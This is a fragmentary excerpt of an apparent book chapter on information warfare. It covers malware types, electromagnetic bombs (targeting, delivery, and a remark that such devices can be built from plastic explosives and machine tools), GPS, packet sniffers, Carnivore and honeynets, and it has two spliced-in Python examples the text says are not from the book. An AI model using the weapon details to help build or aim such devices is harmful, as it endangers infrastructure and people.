If the response of the American defense establishment is any indication, strategic analysts are taking the possibilities of infowar seriously
...
Special committees in every branch of
the U
...
armed forces are studying the potential of infowar, both as a defensive and
an offensive weapon
...
Among the current possible offensive weapons are:
Computer viruses, which could be fed into an enemy’s computers either remotely or by “mercenary” technicians
Logic bombs, another type of virus that can lie dormant for years, until, upon receiving a particular signal, it would wake up and begin attacking the host system
“Chipping,” a plan (originally proposed by the CIA, according to some
sources) to slip booby-trapped computer chips into critical systems sold by
foreign contractors to potentially hostile third parties (or recalcitrant allies?)
Worms, whose purpose is to self-replicate ad infinitum, thus eating up a system’s resources
Trojan horses, malevolent code inserted into legitimate programming to perform a disguised function
Back doors and trap doors, a mechanism built into a system by the designer to
give the manufacturer or others the ability to sneak back into the system at a
later date by circumventing the need for access privileges
The Information Warfare Arsenal of the Future
509
A few other goodies in the arsenal of IW are devices for disrupting data flow or
damaging entire systems, hardware and all
...
Such
devices can destroy electronics and communications equipment over a wide area
...
WEAPONS OF THE FUTURE
Body count: 796
...
The air traffic control system was “cybotaged”
...
It’s suspected that the automated route and altitude management program’s collision-avoidance algorithm was damaged
...
Cause: midair collision with a structure
...
No reports yet on how the
hackers got in
...
A message posted to 90,000 newsgroups from a group known as “The Vulture
of Jihad” claimed credit for the attack
...
Other Islamic splinter groups also claimed credit, along
with a white supremacist faction and an anarchist syndicate
...
The most outrageous theory as
to the identity of the people responsible for the attack came on a hit site called the
Hit Theorist
...
Do these scenarios sound like spin-offs from Fox’s X-Files’ “The Lone Gunmen”? Perhaps
...
The Electromagnetic Bomb: A Weapon of Electrical Mass Destruction
Perhaps the most dangerous of all the defensive and offensive weapons in the IW arsenal of the future is the electromagnetic bomb
...
The development of conventional E-bomb devices allows their use in nonnuclear confrontations
...
The efficient execution of an IW campaign against a modern industrial or
postindustrial opponent will require the use of specialized tools designed to destroy
information systems
...
The EMP Effect
The EMP effect was first observed during the early testing of high-altitude airburst
nuclear weapons
...
The
EMP is, in effect, an electromagnetic shock wave
...
The source can be a nuclear or a nonnuclear
detonation
...
It destroys the electronics
of all computer and communication systems in a quite large area
...
This pulse of energy produces a powerful electromagnetic field, particularly within
the vicinity of the weapon burst
...
It is this aspect of the EMP effect that is of military significance, as it can result in irreversible damage to a wide range of electrical and electronic equipment,
particularly computers and radio or radar receivers
...
The damage inflicted is not
unlike that experienced through exposure to close proximity lightning strikes and
may require complete replacement of the equipment, or at least substantial portions thereof
...
What is significant
about MOS devices is that very little energy is required to permanently wound or
destroy them; any voltage typically in excess of ten volts can produce an effect
termed “gate breakdown,” which effectively destroys the device
...
Wounded devices may still function, but their reliability will be seriously impaired
...
Computers used in data processing systems; communications systems; displays;
industrial control applications, including road and rail signaling; and those embedded in military equipment, such as signal processors, electronic flight controls, and
digital engine control systems, are all potentially vulnerable to the EMP effect
...
Telecommunications equipment can be highly vulnerable, because of
the presence of lengthy copper cables between devices [1]
...
Therefore, radar and electronic warfare equipment,
satellite, microwave, UHF, VHF, HF, and low-band communications equipment
and television equipment are all potentially vulnerable to the EMP effect
...
The Technology Base for Conventional Electromagnetic Bombs
The technology base that may be applied to the design of electromagnetic bombs is
both diverse and in many areas quite mature
...
A wide
range of experimental designs have been tested in these technology areas, and a
considerable volume of work has been published in unclassified literature
...
This treatment is not exhaustive and
is only intended to illustrate how the technology base can be adapted to an operationally deployable capability
...
Unlike the technology
base for weapon construction, which has been widely published in the open literature, lethality-related issues have been published much less frequently
...
This is for good
reasons
...
Equipment that has been intentionally shielded
and hardened against electromagnetic attack will withstand greater orders of magnitude and field strengths than standard commercially rated equipment
...
The second major problem area in determining lethality is that of coupling efficiency, which is a measure of how much power is transferred from the field produced by the weapon into the target
...
Targeting Electromagnetic Bombs
The task of identifying targets for attack with electromagnetic bombs can be complex
...
Buildings housing government offices and thus computer equipment, production facilities, military
bases, and known radar sites and communications nodes are all targets that can be
readily identified through conventional photographic, satellite, imaging radar, electronic reconnaissance, and human operations
...
With the accuracy inherent in global positioning system
(GPS)/inertially guided weapons, the electromagnetic bomb can be programmed to
detonate at the optimal position to inflict a maximum of electrical damage
...
Mobile and relocatable air defense equipment, mobile communications
nodes [2], and naval vessels are all good examples of this category of target
...
In the latter instance, target coordinates
can be continuously datalinked to the launch platform
...
The Information Warfare Arsenal of the Future
513
Mobile or hidden targets that do not overtly radiate may present a problem,
particularly should conventional means of targeting be employed
...
This solution
is the detection and tracking of unintentional emission (UE)
...
Termed “Van Eck
radiation,” such emissions can only be suppressed by rigorous shielding and
emission-control techniques, such as are employed in TEMPEST rated equipment
...
To target such an emitter for attack requires only the ability to identify the type of
emission and thus target type and to isolate its position with sufficient accuracy to
deliver the bomb
...
A good precedent for this targeting paradigm exists
...
Once a truck was identified and tracked, the gunship would engage it
...
The use of stealthy reconnaissance aircraft or long-range, stealthy unmanned aerial vehicles (UAVs) may
be required
...
These
would be programmed to loiter in a target area until a suitable emitter is detected,
upon which the UAV would home in and expend itself against the target
...
Like explosive warheads, electromagnetic warheads
may be fitted to a range of delivery vehicles
...
The choice of a cruise missile airframe will restrict the
weight of the weapon to about 340 kg (750 lb), although some sacrifice in airframe
fuel capacity could see this size increased
...
Therefore, the available payload capacity will be split between the electrical storage and the weapon itself
...
Air-delivered bombs, which have a flight time between tens of seconds
to minutes, could be built to exploit the launch aircraft’s power systems
...
An electromagnetic bomb delivered by a conventional aircraft can offer a much
better ratio of electromagnetic device mass to total bomb mass, as most of the
bomb mass can be dedicated to the electromagnetic-device installation itself
...
A missile-borne electromagnetic warhead installation will be composed of the
electromagnetic device, an electrical energy converter, and an onboard storage device such as a battery
...
The electromagnetic device will be detonated by the missile’s onboard fusing system
...
The warhead fraction (ratio of total payload [warhead] mass to launch mass of the weapon)
will be between 15% and 30%
...
Fusing could be provided by a radar altimeter fuse to airburst the bomb, a barometric fuse, or in GPS/inertially guided bombs, the navigation system
...
Because of the potentially large lethal radius of an electromagnetic device compared to an explosive device of similar mass, standoff delivery would be prudent
...
The recent advent of GPS satellite [3] navigation guidance kits for conventional bombs and glidebombs has provided the optimal means for cheaply delivering such weapons
...
The U.S. Air Force has deployed the Northrop GPS-aided munition (GAM) on
the B-2 bomber as well as the GPS/inertially guided GBU-29/30 joint direct attack
munition (JDAM) and the AGM-154 joint stand-off weapon (JSOW) glidebomb
...
For example, the Australian
BAeA agile glide weapon (AGW) glidebomb is achieving a glide range of about 140
km (75 nautical miles [nmi]) when launched from that altitude
...
First, the glidebomb can be released from outside the effective radius of target air defenses, therefore minimizing the risk to the launch aircraft
...
Finally
the bomb’s autopilot may be programmed to shape the terminal trajectory of the
weapon, such that a target may be engaged from the most suitable altitude and aspect
...
As you can expect GPS-guided munitions to become the
standard weapon in use by Western air forces in the 21st century, every aircraft capable of delivering a standard guided munition also becomes a potential delivery
vehicle for an electromagnetic bomb
...
Because of the simplicity of electromagnetic bombs in comparison with
weapons such as anti-radiation missiles (ARMs), it is not unreasonable to expect
that these should be both cheaper to manufacture and easier to support in the field,
thus allowing for more substantial weapon stocks
...
Defense Against Electromagnetic Bombs
The most effective defense against electromagnetic bombs is to prevent their delivery by destroying the launch platform or delivery vehicle, as is the case with nuclear
weapons
...
The most effective method is to wholly contain the equipment in an electrically
conductive enclosure, termed a “Faraday cage,” which prevents the electromagnetic
field from gaining access to the protected equipment
...
Although optical fibers address this requirement for transferring
data in and out, electrical power feeds remain an ongoing vulnerability
...
A range of devices exist, but care must be
taken in determining their parameters to ensure that they can deal with the rise
time and strength of electrical transients produced by electromagnetic devices
...
Hardening of systems must be carried out at a system level, as electromagnetic
damage to any single element of a complex system could inhibit the function of the
whole system
...
Older equipment and systems may be impossible to harden properly or may require complete replacement
...
An interesting aspect of electrical damage to targets is the possibility of wounding semiconductor devices, thereby causing equipment to suffer repetitive intermittent faults rather than complete failures
...
Intermittent faults may not be economically possible to repair, thereby causing equipment in this state to be removed from
service permanently, with considerable loss in maintenance hours during damage
diagnosis
...
Indeed, shielding that is
incomplete may resonate when excited by radiation and thus contribute to damage
inflicted on the equipment contained within it
...
Where radio frequency communications
must be used, low probability of intercept (spread spectrum) techniques should be
employed exclusively to preclude the use of site emissions for electromagnetic-targeting purposes
...
Communications networks for voice, data, and services should employ topologies with sufficient redundancy and failover mechanisms to allow operation with
multiple nodes and links inoperative
...
Limitations of Electromagnetic Bombs
The limitations of electromagnetic weapons are determined by weapon implementation and means of delivery
...
Means of delivery will constrain the accuracy with which the weapon can be positioned in relation to the intended target
...
In the context of targeting military equipment, it must be noted that
thermionic technology (vacuum tube equipment) is substantially more resilient to
the electromagnetic weapons effects than solid-state (transistor) technology
...
Therefore, a hard electrical kill may not be achieved
against such targets unless a suitable weapon is used
...
Radiating targets such as radars or communications
equipment may continue to radiate after an attack even though their receivers and
data processing systems have been damaged or destroyed
...
Conversely, an opponent
may shut down an emitter if attack is imminent, and the absence of emissions means
that the success or failure of the attack may not be immediately apparent
...
A good case can be made for developing tools specifically for the
purpose of analyzing unintended emissions, not only for targeting purposes but
also for kill assessment
...
Although the relationship between electromagnetic field strength and distance from the weapon is one of an inverse square
law in free space, the decay in lethal effect with increasing distance within the atmosphere will be greater because of quantum physical absorption effects
...
These will therefore
contain the effect of HPM weapons to shorter radii than are ideally achievable in
the K and L frequency bands
...
Should the delivery error be of the order of the weapon’s lethal radius for a given detonation
altitude, lethality will be significantly diminished
...
Therefore, accuracy of delivery and achievable lethal radius must be considered
against the allowable collateral damage for the chosen target
...
An inaccurately delivered weapon of large lethal radius may be unusable
against a target should the likely collateral electrical damage be beyond acceptable
limits
...
The Proliferation of Electromagnetic Bombs
At the time of this writing, the United States is one of several nations with the established technology base and the depth of specific experience to design weapons
based upon this technology
...
As an example, the fabrication of an effective FCG can be accomplished with
basic electrical materials, common plastic explosives such as C-4 or Semtex, and readily available machine tools such as lathes and suitable mandrels for forming coils
...
This cost could be even lower in a third world or newly industrialized economy
...
The dependence of modern economies upon
first world nations’ information technology infrastructures, makes them highly
vulnerable to attack with such weapons, providing that such weapons can be delivered to their targets
...
If the copper media were to be replaced en masse with optical fiber to
achieve higher bandwidths, the communications infrastructure would become
significantly more robust against electromagnetic attack
...
Moreover, the gradual replacement of coaxial
Ethernet networking with 10-Base-T twisted pair equipment has further increased
the vulnerability of wiring systems inside buildings
...
At this time, no counter-proliferation regimes exist
...
With the former Soviet Union suffering significant economic difficulties, the
possibility of microwave and pulse power technology designs leaking out to third
world nations or terrorist organizations should not be discounted
...
A Doctrine for the Use of Conventional Electromagnetic Bombs
A fundamental tenet of IW is that complex organizational systems such as governments, industries, and military forces cannot function without the flow of information through their structures
...
A trivial model for this function would see commands and directives flowing outward from a central decision-making element, with information about the state of the system flowing in the
opposite direction
...
This is of military significance because stopping this flow of information will
severely debilitate the function of any such system
...
Stopping the inward flow of information isolates the decision-making element from reality and thus severely inhibits its capacity to make rational
decisions that are sensitive to the currency of information at hand
...
The Desert Storm air war of 1991 is a good example, with a
substantial effort expended against such targets
...
No less important, modern electronic
combat concentrates on the disruption and destruction of communications and
information-gathering sensors used to support military operations
...
A strategy that stresses attack on the information-processing and communications elements of the targeted systems offers a very high payoff, as it will introduce
an increasing level of paralysis and disorientation within its target
...
Computer Viruses
A virus is a code fragment that copies itself into a larger program, modifying that
program
...
The virus then
replicates itself, infecting other programs as it reproduces
...
One could imagine that the
CIA (or Army, Air Force, etc.
...
As today’s telephone systems are switched by
computers, you can shut them down, or at least cause massive failure, with a virus
as easily as you can shut down a computer
...
It reproduces by copying itself in full-blown
fashion from one computer to another, usually over a network
...
If worms don’t destroy data, they can cause the loss of communication by
merely eating up resources and spreading through networks
...
With a “wildlife” like this, you
could imagine breaking down a networked environment such as an ATM and
banking network
...
It’s a popular mechanism for disguising a virus or a worm
...
If someone edits
this program so that it sends discovered security holes in an email message back to
him (password file could also be included), the cracker acquired much information
about vulnerable hosts and servers
...
Logic Bombs
A logic bomb is a type of trojan horse used to release a virus, a worm, or some other
system attack
...
With the overwhelming existence of U.S.-based software (MS Windows or
UNIX systems), the U.S. government, or whomever you would like to imagine,
could decide that no software would be allowed to be exported from that country
without a trojan horse
...
Its activation could also
be triggered from the outside
...
Trap Doors
A trap door, or a back door, is a mechanism that’s built into a system by its designer
...
As previously mentioned, all U.S. software could be equipped with a trap door
that would allow IW agencies to explore systems and the stored data on foreign
countries
...
Chipping
Just as software can contain unexpected functions, it is also possible to implement
similar functions in hardware
...
They could be built so that they fail after a certain time, blow up
after they receive a signal on a specific frequency, or send radio signals that allow
identification of their exact location—the number of possible scenarios exceeds, by
far, the scope of this chapter
...
The easiest solution is to build the additional features
into all the chips manufactured in the country that is interested in this type of IW
...
Unlike viruses, you can use these to attack not the software but the hardware of a computer system
...
They crawl through the halls and offices until they find a computer
...
Another way to damage the hardware is a special breed of microbes
...
Nano technology and microbes will be discussed in much greater
detail later in the chapter
...
The next step is not to block their traffic, but, instead, overwhelm them
with incorrect information—otherwise known as disinformation
...
The good news is, you’ll always
know exactly where you are
...
Most humans who have ever lived have known roughly where they were, day-by-day, year-by-year
...
For eons, we’ve known things
about ourselves that could be expressed in a statement like “I’m standing on the
threshing floor in the village of my birth” or “I’m walking across the mid-morning
shadow cast by Notre Dame” or even “I’m in a part of town I’ve never seen before
...
On one level, this is like the difference between knowing you’re
coming to the corner where you always turn left on your way to the grocery store
and knowing the names of the streets that cross at that intersection
...
The agent of change will be GPS—the global positioning
system—which, like so many tools of the modern world, is both familiar and misunderstood at the same time
...
Even a venerable tool of navigation such as a sextant knows nothing more about its
location than does the Mona Lisa or the pigments from which she is painted
...
This sounds as
strange and surprising as the Marauder’s Map in the Harry Potter novels [5]
...
A Marauder’s Map of the world would be even
stranger
...
This would be an ever-changing map of a world filled
with artifacts busily announcing something significant about themselves to each
other and to anyone else who cared to listen
...
In August 2000, a company called SiRF Technology based
in Santa Clara, California, announced that it had developed an advanced GPS chip
no bigger than a postage stamp
...
This is a subtle but profound change in the history of
GPS technology—a change driven, like everything else these days, by increasing
miniaturization and declining prices for sophisticated circuitry
...
What SiRF and other companies have in mind, is conferring upon objects a communicable sense of place
...
Some of these objects, especially the big ones, are easy enough to imagine, because they exist now
...
So
do the newest farm implements, such as combines that allow farmers to map crop
yields in precise detail
...
For instance, the Federal Communications Commission requires cellular-phone service providers to be able to identify the location
of a cell-phone caller who dials 911
...
So do beepers and watches and handheld digital assistants and
other digital devices like Game Boy Colors, Tamagotchis (virtual game animals),
dog collars, and, probably, handguns as well
...
There’s always a limit to
how far one can see into the future of the tools being used, especially into a future
where those tools become interlinked
...
Now there’s the Internet and the World Wide Web, whose far-reaching implications are only dimly visible, but which have already transformed the way countries
all over the world do business
...
It’s already
obvious how useful GPS is in discrete applications: for surveying and mapmaking,
the tracking of commercial vehicles, maritime and aeronautic navigation, and for
use by emergency rescue crews and archaeologists
...
Awareness may be a metaphor when applied
to inanimate objects, but the potential of that metaphor is entirely literal
...
They were put there by the DoD, which began the
NAVSTAR global positioning system program in 1973
...
It could take an hour and a half for a Transit satellite to saunter above
the horizon and then another 10 or 15 minutes to fix the submarine’s position
...
The U.S. Air Force tracks the satellites from Colorado Springs, Colorado, Hawaii, and three other islands: Ascension
in the South Atlantic, Diego Garcia in the Indian Ocean, and Kwajalein in the South
Pacific
...
Ordinary
users can track this constellation of satellites with one of several Web sites or with
an appealing public-domain software program called Home Planet, which can map
any satellite you choose, GPS or not, against a projection of the Earth’s surface
...
In the world of GPS, knowing where you are, give or take a few meters, depends
on knowing precisely when you are
...
The problem with finding longitude in Harrison’s era was
making a chronometer that could keep accurate time at one location (Greenwich,
England) even while the ship carrying that chronometer was halfway around the
globe
...
GPS satellites effortlessly provide a constant frame of reference
...
The satellite clocks are
accurate to within one-millionth of a second of UTC as kept by the U.S. Naval Observatory
...
As far as most civilian users are concerned, GPS is more accurate for time
than it is for position, and, in most cases, GPS is far more accurate for position than
it is for altitude
...
Now, GPS time is available globally to anyone with a receiver
...
The U.S. military and other authorized users also receive two encrypted signals—one from L1, another from a frequency called L2
...
By measuring the time it takes a signal to reach it, a GPS receiver
calculates what is called the pseudo-range to the transmitting satellite
...
It can also calculate velocity by comparing location readings
taken at different points in time
...
When you begin to move, a GPS springs to life
...
A navigator’s task has always been to plot his current position, compare it with his previous day’s position, and deduce from those two points some idea
of tomorrow’s position
...
It’s no wonder GPS has rapidly
made its way into the navigation stations of recreational boats and commercial ships
alike, replacing older electronic navigation systems as well as celestial navigation
...
The system is purposely compromised,
its accuracy intentionally degraded
...
One way
to do that is to de-enhance everyone else’s effectiveness—to deny nonmilitary users
and foreign adversaries the kind of accuracy that military users enjoy, which in all
kinds of targeting weapons is a difference of dozens of feet
...
One of
the many ironies of GPS, however, is that a system designed mainly for military use
and developed through the DoD at a cost of more than $10 billion has been engulfed by the commercial market
...
The more positional signals a GPS receives, the more accurate it is
...
Even at present, there are ways
around selective availability
...
The most common solution is differential GPS, or DGPS, in which “differential corrections” (indications
of the degree of error at one station) are transmitted to GPS receivers via a radio
link, greatly enhancing their accuracy regardless of selective availability
...
The U.S. Coast Guard operates a maritime DGPS service available to civilians,
and the Federal Aeronautics Administration is implementing a similar system,
called the Wide Area Augmentation System, which uses satellites as well as ground
stations
...
The result of
this is a bizarre irony, in which some branches of the federal government are working hard to offset error purposely created by another federal agency, the DoD
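The pseudo-range idea (range = signal travel time times the speed of light, with the receiver's unknown clock error folded in) and the differential corrections described above, as an added worked example that is not from the book: satellite positions, receiver clock biases and per-satellite range errors are all constructed, the solver is a plain Gauss-Newton least-squares fit, and it accepts any number of satellites from four upward, so it also shows why more signals give a better fix.

```python
import math

C = 299_792_458.0  # speed of light in m/s

# Constructed satellite positions in Earth-centred coordinates (metres). Real
# GPS orbits are ~20,200 km above the surface; these are chosen only to give
# a well-spread geometry, not to model a real constellation.
SATS = [
    (26_000e3, 0.0, 0.0),
    (15_000e3, 20_000e3, 0.0),
    (15_000e3, -8_000e3, 18_000e3),
    (15_000e3, -8_000e3, -18_000e3),
    (18_000e3, 10_000e3, -12_000e3),
]


def distance(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def solve_linear(a, y):
    """Solve a square system a*x = y by Gaussian elimination with partial pivoting."""
    n = len(y)
    m = [row[:] + [y[i]] for i, row in enumerate(a)]
    for col in range(n):
        pivot = max(range(col, n), key=lambda r: abs(m[r][col]))
        m[col], m[pivot] = m[pivot], m[col]
        for r in range(col + 1, n):
            f = m[r][col] / m[col][col]
            for c in range(col, n + 1):
                m[r][c] -= f * m[col][c]
    x = [0.0] * n
    for r in range(n - 1, -1, -1):
        x[r] = (m[r][n] - sum(m[r][c] * x[c] for c in range(r + 1, n))) / m[r][r]
    return x


def pseudoranges(sats, receiver, clock_bias_s, range_errors=None):
    """Constructed measurements: true range + receiver clock error (+ per-satellite error,
    standing in for deliberate degradation such as selective availability)."""
    errs = range_errors or [0.0] * len(sats)
    return [distance(s, receiver) + C * clock_bias_s + e for s, e in zip(sats, errs)]


def fix_position(sats, rho, iterations=20):
    """Gauss-Newton least squares for (x, y, z, c*bias) from four or more pseudoranges.
    Returns (position in metres, receiver clock bias in seconds)."""
    pos = [0.0, 0.0, 0.0]  # start at Earth's centre; the iteration converges from there
    cb = 0.0               # clock bias expressed as a distance
    for _ in range(iterations):
        rows, resid = [], []
        for s, r in zip(sats, rho):
            d = distance(s, pos)
            rows.append([(pos[k] - s[k]) / d for k in range(3)] + [1.0])
            resid.append(r - (d + cb))
        # Normal equations (J^T J) dx = J^T r, so extra satellites are simply more rows.
        jtj = [[sum(row[p] * row[q] for row in rows) for q in range(4)] for p in range(4)]
        jtr = [sum(row[p] * res for row, res in zip(rows, resid)) for p in range(4)]
        dx = solve_linear(jtj, jtr)
        pos = [pos[k] + dx[k] for k in range(3)]
        cb += dx[3]
        if max(abs(v) for v in dx) < 1e-4:
            break
    return tuple(pos), cb / C


def dgps_corrections(sats, rho_ref, ref_position):
    """What a reference station at a surveyed position broadcasts: measured minus
    expected range per satellite. Its own clock error rides along and is absorbed
    into the rover's clock term."""
    return [r - distance(s, ref_position) for s, r in zip(sats, rho_ref)]


def apply_corrections(rho, corrections):
    return [r - c for r, c in zip(rho, corrections)]


def velocity(fix_a, fix_b, dt_s):
    """Velocity vector (m/s) from two position fixes taken dt_s seconds apart."""
    return tuple((b - a) / dt_s for a, b in zip(fix_a, fix_b))


def demo():
    """Position error (metres) without and with differential corrections."""
    truth = (6_371e3, 0.0, 0.0)                      # receiver on the surface, x axis
    dither = [120.0, -80.0, 45.0, -30.0, 90.0]       # constructed per-satellite errors
    rho = pseudoranges(SATS, truth, 1e-3, dither)
    naive, _ = fix_position(SATS, rho)
    ref_pos = (6_371e3, 50e3, 0.0)                   # reference station 50 km away
    rho_ref = pseudoranges(SATS, ref_pos, -2e-4, dither)
    corr = dgps_corrections(SATS, rho_ref, ref_pos)
    fixed, _ = fix_position(SATS, apply_corrections(rho, corr))
    return distance(naive, truth), distance(fixed, truth)
```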
...
Most of us think of the Earth as an inherently stable platform: bedrock
...
Tectonic plates grind at each other’s
edges, cresting upward
...
It adjusts locally to the shock of earthquakes and volcanoes
...
Torques from the atmosphere, ocean, and fluid
core move the rotation axis relative to the crust of Earth
...
GPS offers an extraordinary leap in the rate of data
collection, with a corresponding leap in the understanding of Earth’s motion
...
GPS offers one version of freedom—knowing where
you are—but it may ultimately threaten a more basic kind of freedom—being
where you are without anyone else knowing it
...
The value of cell phones embedded with GPS chips is obvious when it
comes to emergency services, but the cell-phone service providers’ ability to track
the location of a 911 call means that GPS could track the location of every other
kind of call as well
...
This is both a form of insight to the vehicle
owners and a form of intrusion to the drivers, who find their movements visible to
management in a way they never were before
...
There is only a difference
of emphasis between tracking a parolee with a GPS and tracking a sales representative with the same tool
...
Location, movement, and time are not innocuous forms of information
...
All of us inhabit a world of the senses, a world infinitely full of sensory clues
to our location and bearing
...
The very factors
that influence Earth’s rotation (the sun, moon, planets, atmosphere, oceans) influence our sense of orientation, if only we can remember how to know them
...
GPS may mean many
wonderful things, but it may also mean yet another death for the powers of human
observation
...
Now that the nonaqueous and nonarctic globe is mostly paved, and the population
of people is as thick on the Earth as mold on month-old bread, a device has been invented at last that tells you where you are without having to ask strangers
...
The meaning of “snuff” tools is obvious
...
Snoop and Sniff Tools
Sniffit is a kind of a network packet sniffer and snooper
...
Under many networking protocols, data that you transmit gets split into small segments, or packets,
and the Internet protocol (IP) address of the destination computer is written into the
header of each packet
...
As each packet travels around that destination segment, the network card on
each computer on the segment examines the address in the header
...
Promiscuous Network Cards
Packet sniffers work slightly differently
...
This lets the packet sniffers see
all data traffic on the network segment to which they’re attached—if they’re fast
enough to be able to process all that mass of data, that is
...
This data is also useful for other purposes
...
That last application is a real case of
turning the tables on the attackers: hackers use packet sniffers to check for confidential data; companies use packet sniffers to check for hacker activity
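The header check and the promiscuous-mode difference described above, as an added example that is not from the book: a constructed Ethernet II/IPv4 segment (locally administered MACs, private addresses), a model of a card deciding which frames to pass up in normal versus promiscuous mode, and the defensive use of that same visibility at the end.

```python
import socket
import struct

ETHERTYPE_IPV4 = 0x0800
BROADCAST_MAC = b"\xff" * 6
PROTO_NAMES = {1: "icmp", 6: "tcp", 17: "udp"}


def build_frame(dst_mac, src_mac, src_ip, dst_ip, proto=6, payload=b""):
    """Assemble a minimal Ethernet II frame carrying an IPv4 header (constructed test
    data; the IP checksum is left at zero because nothing here validates it)."""
    ip_header = struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, 20 + len(payload), 0x1234, 0, 64, proto, 0,
        socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
    )
    return dst_mac + src_mac + struct.pack("!H", ETHERTYPE_IPV4) + ip_header + payload


def parse_frame(frame):
    """Decode what a sniffer inspects first: the link-layer addresses and, for IPv4,
    the endpoints written into the packet header."""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    info = {"dst_mac": frame[:6].hex(":"), "src_mac": frame[6:12].hex(":"), "ethertype": ethertype}
    if ethertype == ETHERTYPE_IPV4 and len(frame) >= 34:
        ihl = (frame[14] & 0x0F) * 4          # header length in bytes
        info.update(
            src_ip=socket.inet_ntoa(frame[26:30]),
            dst_ip=socket.inet_ntoa(frame[30:34]),
            proto=PROTO_NAMES.get(frame[23], str(frame[23])),
            payload=frame[14 + ihl:],
        )
    return info


def nic_accepts(frame, own_mac, promiscuous=False):
    """A card in normal mode keeps frames addressed to it or to everyone and drops the rest;
    in promiscuous mode it passes every frame on the segment up to the host."""
    if promiscuous:
        return True
    dst = frame[:6]
    return dst == own_mac or dst == BROADCAST_MAC


def visible_frames(frames, own_mac, promiscuous=False):
    return [parse_frame(f) for f in frames if nic_accepts(f, own_mac, promiscuous)]


# Constructed segment: three hosts, one cleartext login exchange, one broadcast.
ALICE = bytes.fromhex("02000000000a")
BOB = bytes.fromhex("02000000000b")
CAROL = bytes.fromhex("02000000000c")
SEGMENT = [
    build_frame(BOB, ALICE, "10.0.0.1", "10.0.0.2", payload=b"USER alice"),
    build_frame(ALICE, BOB, "10.0.0.2", "10.0.0.1", payload=b"331 send password"),
    build_frame(BOB, ALICE, "10.0.0.1", "10.0.0.2", payload=b"PASS secret"),
    build_frame(BROADCAST_MAC, ALICE, "10.0.0.1", "10.0.0.255", proto=17),
]


def what_carol_sees():
    """Frames Carol's host receives as a normal station versus in promiscuous mode."""
    return len(visible_frames(SEGMENT, CAROL)), len(visible_frames(SEGMENT, CAROL, promiscuous=True))


def flag_cleartext_logins(frames):
    """The defender's use of the same visibility: report (src, dst) pairs whose payload
    carries a password in the clear, so the protocol can be replaced, not exploited."""
    hits = []
    for info in visible_frames(frames, b"", promiscuous=True):
        if info.get("proto") == "tcp" and info.get("payload", b"").startswith(b"PASS "):
            hits.append((info["src_ip"], info["dst_ip"]))
    return hits
```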
...
The thing that worries most people about Sniffit is how easy it is to install
...
It even has a graphical user interface (not exactly pretty,
but it is free)
...
It is recommended that you install a packet sniffer and have a look at what sort
of data you can see on your local network
...
They probably know of better, more professional sniffers and will be able to talk you through some of the data that you see going past
...
Sniff
Security experts are still not convinced that Carnivore (the software created by the
FBI to tap into Internet communications) is either ready to be used safely (without
abuse) or can gather information that would be legally admissible in court
...
Carnivore’s source code should be made available for open review
...
Unless it is demonstrated that Carnivore will enable
surveillance personnel to obtain the information they are authorized to see, and not
draw innocent bystanders into its net, it will remain an object of public suspicion
...
Congress and privacy advocates then called
for full disclosure of the software
...
Illinois Institute of Technology’s Research
Institute (IITRI) was chosen after accepting the review limits proposed by the FBI,
a stipulation other institutions such as the San Diego (California) Supercomputing
Center would not accept
...
Although it looks
at how Carnivore worked when it was used as intended, the report failed to look at
the larger issue: its system requirements
...
Thus, the vulnerability of the system to hackers is still not
clearly established
...
At that level, the operator (meant
to be an FBI agent) has a great deal of freedom
...
What is more,
anyone logged in as administrator can hide any evidence of the activity
...
Failure to examine the interaction between Carnivore and an ISP’s systems
may be a gap in the report
...
The scope of IITRI’s review was dictated by the FBI, and any additional effort would have invalidated the contract under which the work was performed
...
Clearly, this can
cause confidential internal communications to be compromised
...
THE PRIVACY FOUNDATION
The Privacy Foundation at the University of Denver conducts research into communications technologies and provides the public with tools to maintain privacy in
the Information Age
...
The report cites the following possible uses for this security breach:
The wiretaps can provide the ability to monitor the path of a confidential email
message and the written comments attached
...
A bugged email message can capture thousands of email addresses as the forwarded message is sent around the world
...
This security problem is a particularly dangerous one for organizations that
conduct conversations containing sensitive internal information via email
...
If there’s an email wiretap on the original external document,
each time someone forwards the message to someone else, a copy of their message
is automatically and invisibly emailed to the original sender of the external message
(or someone designated by him)
...
Eudora and AOL are not affected, nor are Web mail services such
as Yahoo and Hotmail
...
The Pentagon envisions a war in the heavens, but can it defend the ultimate high ground? You bet! Witness the experimental idea of setting up a
decoy network separate from your real one to fool intruders as they try to fool you
...
Rather, the decoy net is an entire fake network, complete with host computers on a LAN with simulated traffic,
to convince hackers for as long as possible that it’s real
...
A group calling itself the Honeynet Project has quietly begun testing decoy
networks on the Internet
...
Other decoy networks slow intruders with an eye toward
collecting evidence to prosecute them
...
The idea is to feed back information about what
hackers do to a kind of “deception central” for network administrators
...
It is possible to create a deception network that has the same IP network address as your real network
...
There is a risk that administrators will lose track of what’s real and what’s not
...
It’s not clear yet if you can fool a lot
of people with this deterrent
...
It’s
pretty nasty stuff
...
Many tools that let hackers carry out surveillance are now Web-based
...
No complicated downloads or zip files
...
Although a talented few among hackers actually
make attack tools, many of these tools today are freeware and they’re posted on
dozens of techie sites, not the secret underground
...
In the wrong hands this tool is dangerous, but that version isn’t as dangerous as
other versions that will be released
...
Serbian forces were sowing terror across Kosovo
...
Errant NATO
bombs had killed dozens of civilians and shaken support for the alliance
...
A Colorado outfit, called Space Imaging, was
about to launch a picture-taking satellite with clarity nearly as good as that of U.S. spy satellites
...
That had to be stopped
...
The U.S.-licensed firm
could simply be ordered not to take pictures over a broad swath of Europe
...
In the
end, however, no order was issued
...
Fortune may not be so kind next time
...
Several other companies are right behind it
...
There’s a new proliferation of space-based capabilities
...
That’s pushing the Pentagon into a whole new kind of warfare
...
That’s a nice way of saying the Pentagon needs to be prepared
to defend the ultimate high ground by attacking hostile satellites
...
It must also come up with plans for deploying
space-based lasers or other weapons that could be used against targets anywhere on
Earth or above it
...
Aggressive “space control,” as the military calls its quest for dominance in the
sky, could backfire
...
Developing space weapons would be a mistake
of historic proportions that would trigger an arms race in space
...
In Pentagon war games, just trying to
defend U.S. satellites causes problems
...
The activity ends up being the problem and not the solution
...
Let’s look first at spies the size of a mote of dust
...
Spy Dust Balls
“If only these walls could talk” may not be an idle plea much longer
...
Thousands of these gossipy particles, each a tiny
bundle of electronic brains, laser communications system, power supply, sensors,
and even a propulsion system, could lurk all around, almost undetectable
...
A DUSTY FUTURE
